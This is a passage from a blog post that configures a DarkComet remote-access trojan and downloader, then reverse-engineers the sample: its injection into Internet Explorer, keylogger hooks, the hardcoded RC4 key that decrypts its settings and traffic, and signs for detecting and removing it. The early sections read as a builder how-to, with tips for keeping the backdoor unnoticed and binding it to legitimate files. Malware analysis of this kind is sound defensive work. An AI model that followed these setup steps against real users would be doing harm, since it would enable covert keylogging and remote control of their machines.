We want to make the backdoor as widely usable as possible, so we’ll enable just the first three options. In a real configuration I wouldn’t mess up with the firewall, UAC and AV notification, that would probably be too “noisy” and any user with just a little bit of knowledge about what he’s doing will understand that something is wrong. After setting up everything we like, we can just jump to the keylogger configuration:
The ftp server is optional and only required if you want to transfer keylog data via ftp. If you like, setup your FTP (just use FileZilla Server if you don’t have one already running) and fill the credentials, my password is the same used to encrypt the traffic: quepassword. Decide if you want to change the icon or mess up with the victim’s hosts file and go to the Build Module section. We’re not using the file binder because it wasn’t used in the original attack, anyway should you be curious, what you have to know is that it’s a simple packager that starts one file and drop the other in the %tmp% directory, running it at the same time. That’s what you would use if you want to bind the backdoor with another legitimate file.
Choose if you like your final executable packed or not and finally build the server!!

Configuring the Downloader

This is the easy part: simply go back to DarkCometRAT and choose Edit Server Downloader, you’ll have to just setup the web server address where your backdoor is stored:

Configuring the Client

Open the Client Settings option and don’t forget to setup your password if you want your target to connect back to you:
Any other option is up to you and most probably not needed for your analysis. Get back to DarkCometRAT and setup a socket and a port where you want to listen for connections; don’t forget to forward this port to your computer if you’re behind a NAT, or to enable UPnP:
I’ve used port 885, the same used for the attack reported by the Syrian protesters, it really doesn’t matter which one you choose, just be sure to setup the same port both on the server and client part. Finally we are ready to proceed with the fun part.

Detection Rate

These are the detection rates reported by VirusTotal for the download and the backdoor:
SHA1: 3ac42898ae92e106b8002929d50eb51b6a3dbec7
File size: 3.0 KB ( 3072 bytes )
File name: downloader.exe
File type: Win32 EXE Detection ratio: 28 / 43
SHA1: 42d85163e18f35fd435b5f96a0bce10b8336b440
File size: 745.0 KB ( 762880 bytes )
File name: server.exe
File type: Win32 EXE Detection ratio: 34 / 43
The downloader is detected mostly as a Generic.Downloader, mainly that’s what it is. The server is detected as Finlosky or W32.SpyBot by most antiviruses, sometimes I really wonder about the names given by the various companies. Surprisingly enough TrendMicro, the first to analyze the malware used in Syria, didn’t detect any of them at the time of writing. Probably even more surprising should also be the fact that a public tool doesn’t get a 43/43 detection rate.

Downloader Analysis

Fire up your preferred disassembler and let it crunch our tiny downloader, as you will see the code is really simple:
It just loads the binary patched url from the resources, downloads the executable file and runs it, simple enough. Just by owning this file we can simply retrieve the original malware, as you can see from this hex dump:
Filename and URL are not scrambled/encrypted in any way.

Server Analysis

Retrieve the malicious file from the url pointed by the downloader and take a clean snapshot of your Virtual Machine, a Windows 7 32-bit in my case.
Before running the file we may want to take a snapshot of the registry and of our documents and tmp directory in order to understand which files and registry entries are created/dropped. For this purpose we can use the handy RegShot application (http://sourceforge.net/projects/regshot/):
Take the first shot before running the file, and the second one after running it, from this comparison we’ll understand that a couple changes have been brought to our system, first new files have been created:
C:\Users\Quequero\Documents\MSDCSC\darkcomet.exe
C:\Users\Quequero\AppData\Local\Temp\dclogs\2012-03-09-6.dc
Then a new registry entry has been added:

The original file hides itself after being ran. This is not a stealth behavior; normally the files you run don’t disappear, so unless your backdoor is started by another file from a temporary directory, auto removal is not the brightest idea. We can also monitor the process using SysAnalyzer in order to find out what are the processes created, from this analysis we see that the backdoor uses several system executable:

The Internet Explorer process is most probably created in order to bypass the firewall. So we can strongly suspect that the backdoor’s code is injected into that process. Let’s now run GMER, a popular rootkit detector, on our system. GMER is pretty advanced and implements a variety of techniques that are able to spot many common rootkits, let’s see what happens:
Indeed nothing is detected by GMER, this either means that DarkComet is not using any rootkit technique or that it’s so advanced to even fool GMER. At least by using GMER’s file manager we see that the original file is still on the desktop but hidden to the view:
C:\Users\Quequero\Desktop>attrib server.exe
A SH I C:\Users\Quequero\Desktop\server.exe
Should you be curious, RootkitUnhooker and even Volatility are not detecting anything suspicious here… DarkComet’s coder wins hands down on this.
So far we have just a few clues that DarkComet is running on our system, let’s perform some checks on our network traffic. For this purpose we run Wireshark:

As you can see DarkComet traffic is pretty noticeable, let’s try to follow the stream:
Apparently it’s just a bunch of data, most probably the traffic is encrypted, so wear your Samurai belt and turn on your preferred Debugger, we have an algorithm and a key to find!

Diving into the Debugger

We need to attach to the backdoor, but you’ll soon find out that the FWB option prevents the backdoor from working correctly if the debugger is active. We are not going to disable the option because we are pretending to be analyzing a real malware, thus we’ll kill the backdoor and run it from the debugger. Just above we have seen that DarkComet probably runs from inside Internet Explorer process, so simply kill it, the backdoor (with my surprise) won’t respawn. Then point your debugger to the installation path and run it. For this task I’ve used OllyDbg v2.0-alpha4 (www.ollydbg.de) and the backdoor file installed in my Documents directory. Start your process and step a few instructions after the entry point, until you get here:
DarkComet loads the password from the binary and uses it for the encryption engine. Trying to find the password in the executable will get you nowhere, for the simple reason that the original password is encrypted. That’s definitely a good idea and we’ll delve into the encryption scheme just in a moment, for now we can step a bit further until we retrieve some more information, like the C&C server address:
In this case it’s 192.168.150.129 on port 885, we can also recover the full installation path:
And in the very same way also the ftp address, port, password, user and everything we’ve setup during the building phase. All of these options are string-encoded into the final binary and encrypted, as an attempt to avoid disclosing “sensitive” data and to protect the user. This is a smart move, of course, and we want to better understand the encryption algorithm and the original key used. In this way we’ll be able to decrypt the network traffic of an infected machine and even to take control of an already infected target, in order to remove the malware from it.
Restart the malware from the debugger and start tracing the first call that loads the “PWD” resource from the file:
Keep following it and you’ll eventually arrive here:
Check the registry window:
You’ll find two interesting strings, take note of their values and proceed a bit further into the same function until you’ll get here:
This loop is particularly interesting for several reasons: first of all there’s a big buffer that is continuously rearranged and then a xor that uses the values extracted from the buffer. We are definitely dealing with some kind of encryption algorithm, but which one? I had to go back to pen&paper&IDA to find it out, and even though I’m pretty quick to recognize an encryption algorithm from the disassembly, this one took me some minutes. So, what is it? The good old RC4! Only with a few optimizations introduced by the compiler that add entropy to the pool, making it just a bit harder to recognize on first sight. To avoid any doubt just reconstruct it from the Disassembler (IDA in this case):
There you go, it’s RC4 for sure and this is the first step of the permutation initialization. Then we have the algorithm:
RC4 is an algorithm loved almost by everyone. It’s a stream cipher, so you won’t have to deal with padding, easy to understand, short and fast. The downside is that it’s tremendously easy to use in the wrong way, but this is another story. Apparently the algorithm is initialized with a fixed key “#KCMDDC5#-890″ and this key is used to decrypt a string: “2955B175B3D8DFAFF28DFF”. To check if I was right, I wrote a helper application that implements RC4, this was the result:
./rc4 –k “#KCMDDC5#-890″ –d 2955B175B3D8DFAFF28DFF
output: quepassword
oh look! This is the password we’ve setup during the configuration step! So to avoid storing the password in clear-text it’s been encrypted with a default password hardcoded into the binary. The same key is also used to decrypt all the other settings, later on you’ll find other strings:
./rc4 –k “#KCMDDC5#-890″ –d 1C638B4887FFE980B0AEEE23
output: DC_MUTEX-Que
But if you try to use the same password to decrypt the network traffic, you’ll just end up with a bunch of garbage. To understand why you’ll have to hook into one of the threads that are used to communicate with the C&C server:
Trying to follow the function that encrypts the traffic, you’ll find out that the algorithm used is the same (once again: RC4) but the key used is created by concatenating the hardcoded password with the one we chose at the moment of setup, in our case:
    #KCMDDC5#-890quepassword
If you try not to use a password, the traffic will still be encrypted:
This time with the hardcoded: “#KCMDDC5#-890″. Trying to decrypt part of the above dump with the right key, will lead you to the clear-text commands:
    SERVER
GetSIN192.168.150.137|243968

Keylogger

An interesting function is the keylogger of course, as we have seen above a file is created into the user’s temporary directory:
C:\Users\Quequero\AppData\Local\Temp\dclogs\2012-03-09-6.dc
Opening it will reveal keylogger’s data:
It’s not clear why this file has been left visible and in clear text, anyway the data will be appended here and sent via ftp, if enabled, when the logfile reaches a given size in kilobytes (FTP_SIZE variable into the executable):
EDX points to the size, shown in the above picture, with the ASCII value of 0×31 that means “1″ Kb. But how’s keylogging performed? Since no driver has been loaded by the backdoor we have to assume that it does something in userspace, and indeed this is the case, in fact the keylogging thread will simply call SetWindowsHook to receive the keyboard notifications:
What I marked as hookProc takes care of keyboard data processing, there’s a big switch that identifies every single keystroke, including special keys:
Every keystroke is processed consequently and then logged into the directory shown above:

Injection

To bypass a firewall that might be in use into the victim’s system, DarkComet uses a simple but effective trick: it simply injects the communication code into a process that’s allowed to pass through the firewall, in this case it’s Internet Explorer, thus confirming our suspects. The injection takes place in this way: first of all Internet Explorer is identified, opened in background, suspended, then some “extra” memory is allocated into the process and DarkComet’s code copied inside this new buffer, following that the process is resumed. The routine that takes care of the injection is, in part, the following:
A confirmation that Internet Explorer is used to send the traffic can be obtained simply by inspecting the “hidden” process with ProcessExplorer:
Also in the same way we can identify the backdoor’s mutex:
During the analysis through the disassembler you won’t be able to find references to the entire API used by the binary, this is because a lot of them are resolved directly using GetProcAddress and then stored into pointers available to the backdoor:
To find where they are resolved, simply look all the X-refs to GetProcAddress and follow them one by one, to give you an idea that’s what you’re going to find:
It won’t take long to give a name to every pointer and it will be of great help, should you decide to proceed by yourself with the analysis of the binary.

Detection & Clean up

Detecting DarkComet, in some situation, can be non-trivial. We have examined just one possible case, the backdoor can be stored anywhere, with any name, packed with any packer. The best solution would be to use DarkComet Removal Tool from the home page of the RAT, anyway if you don’t totally trust the author on that there are still come clues you can catch:
  • Monitor the traffic, KEEPALIVE messages are always sent in clear and the traffic patterns are pretty constant in time
  • Check for FTP data, keylogger can be configured to deliver keystrokes this way, in clear
  • Check for hidden instances of iexplore.exe, use ProcessExplorer to see if it’s making traffic
  • Check for unknown values in HKCU/Software/Microsoft/Windows/CurrentVersion/Run/
  • Check for unknown values in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ into the “Userinit” key, this is another path used by the backdoor to run at startup
  • Check for an empty link into the programs\startup section in the start menu
  • Check for the existence of %tmp%/dclogs/ directory, that’s where you’ll find keylogger’s data
Detecting the keylogger might not be that easy, you’ll have to walk down the hook chain to find it. This is fun but out of the scope of this article, maybe we’ll analyze some keylogging detection techniques in a future article.
Once you have identified the threat remove the registry entries, kill the hidden iexplore.exe, remove the logs directory, remove the executable (you can retrieve the installation path directly from the registry) and reboot. Don’t foget that with the knowledge acquired so far you’ll also be able to extract the password from any DarkComet sample. This way you’ll be able to dump the configuration and understand exactly what the Trojan is doing on a given system and where it is sending the data.


Click:Download

Like Us Anonops Anonimo


Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by http://www.thepiratesoft.org/ | Bloggerized by Lasantha - Premium Blogger Themes | Hack